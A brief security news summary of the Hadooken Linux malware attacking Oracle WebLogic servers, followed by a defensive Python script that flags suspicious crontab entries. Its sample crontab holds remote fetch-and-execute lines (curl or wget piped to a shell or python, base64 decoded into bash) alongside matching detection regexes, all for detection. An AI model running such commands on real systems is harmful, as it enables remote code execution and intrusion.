September 13, 2024 at 08:03AM
A new Linux malware named Hadooken targets Oracle WebLogic servers to install additional malware and extract credentials. It is deployed through attacks that exploit weak passwords, then downloads shell and Python scripts to ensure the payload executes successfully. Hadooken drops a cryptominer and the Tsunami malware, and creates cron jobs for persistence. Connections to other ransomware families were also identified.
The meeting notes highlight the discovery of a new Linux malware called Hadooken, observed targeting Oracle WebLogic servers to deploy additional malware and extract credentials for lateral movement. The malware is deployed in attacks that exploit weak passwords for initial access; upon execution, it drops a cryptominer and the Tsunami malware to achieve persistence. The attackers were seen using PowerShell to distribute the Mallox ransomware to Windows systems, while also targeting Linux servers with various ransomware families. It was also noted that over 230,000 internet-connected WebLogic servers are at risk due to potential vulnerabilities and misconfigurations.
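Because the summary singles out cron jobs as the persistence mechanism on the compromised WebLogic hosts, a defender's first check on a suspect Linux server is an audit of crontab entries for fetch-and-execute patterns. The script below is an added example and not code from the page or from any of the reports it summarizes; the crontab content, the documentation-range IP addresses and the detection patterns are all constructed for illustration, not indicators taken from Hadooken samples.

```python
import re

# Constructed sample crontab (not from the page): one benign entry and several
# showing the generic "download a script and pipe it to an interpreter" or
# "run a hidden binary from a world-writable directory" persistence shapes.
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://203.0.113.10/x.sh | sh
@reboot wget -qO- http://198.51.100.7/p.py | python3
*/10 * * * * /dev/shm/.h >/dev/null 2>&1
0 * * * * echo aGVsbG8= | base64 -d | bash
"""

# Heuristic patterns a reviewer would flag for manual follow-up. They are
# deliberately broad; tune them against your own baseline before alerting.
SUSPICIOUS_PATTERNS = [
    ("remote_fetch_pipe_exec",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sh|bash|python\d?)\b")),
    ("base64_decode_exec",
     re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(sh|bash|python\d?)\b")),
    ("tmp_path_exec",
     re.compile(r"(^|\s)(/tmp|/dev/shm|/var/tmp)/\S+")),
]


def parse_cron_lines(text):
    """Yield (schedule, command) for each non-comment crontab line.

    Handles both the five-field form ("*/5 * * * * cmd") and the
    "@reboot cmd" shorthand; malformed lines are skipped.
    """
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            parts = [" ".join(fields[:5]), fields[5]]
        if len(parts) == 2:
            yield parts[0], parts[1]


def flag_suspicious(text):
    """Return [(schedule, command, [matched pattern names])] for risky entries."""
    findings = []
    for schedule, command in parse_cron_lines(text):
        reasons = [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(command)]
        if reasons:
            findings.append((schedule, command, reasons))
    return findings


if __name__ == "__main__":
    # On a real host, feed this the output of `crontab -l` for each user and
    # the contents of /etc/crontab and /etc/cron.d/* instead of SAMPLE_CRON.
    for sched, cmd, why in flag_suspicious(SAMPLE_CRON):
        print(f"[{', '.join(why)}] {sched} -> {cmd}")
```

Run against the constructed crontab it reports four of the five entries; the logrotate line is left alone. Matching on the command text only, not on hashes or hostnames, keeps the check useful after the operators rotate infrastructure, at the cost of some false positives from legitimate automation that also pipes downloads into a shell.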